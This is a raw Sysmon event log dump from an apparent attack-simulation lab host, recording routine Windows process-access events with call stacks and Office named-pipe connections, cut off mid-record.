14:58:06.654{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3fbe5|C:\Windows\SYSTEM32\twinapi.appcore.dll+2effb|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357b5|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.654{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-200E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.639{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-200E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f0db|C:\Windows\System32\modernexecserver.dll+3f049|C:\Windows\System32\modernexecserver.dll+3fd2f|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3f6a2|C:\Windows\System32\modernexecserver.dll+3fd1e|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+3f342|C:\Windows\System32\modernexecserver.dll+3fd0b|C:\Windows\System32\modernexecserver.dll+3fe52|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}4241364C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+41bd7|C:\Windows\System32\modernexecserver.dll+3fdee|C:\Windows\SYSTEM32\twinapi.appcore.dll+2efb4|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f0e4|C:\Windows\SYSTEM32\twinapi.appcore.dll+357ab|C:\Windows\SYSTEM32\twinapi.appcore.dll+34ef6|C:\Windows\SYSTEM32\twinapi.appcore.dll+34eb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2f400|C:\Windows\System32\modernexecserver.dll+47a8c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000078164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.607{A7A01FEF-C0A6-607E-7805-00000000BB01}424612C:\Windows\system32\sihost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+119d|C:\Windows\System32\modernexecserver.dll+478ab|C:\Windows\System32\modernexecserver.dll+476e0|C:\Windows\System32\modernexecserver.dll+4763b|C:\Windows\System32\modernexecserver.dll+3985d|C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll+1781|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 18141800x800000000000000078163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000078151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000078150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43486892C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000078149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000078147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000078145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000078144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.529{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Wind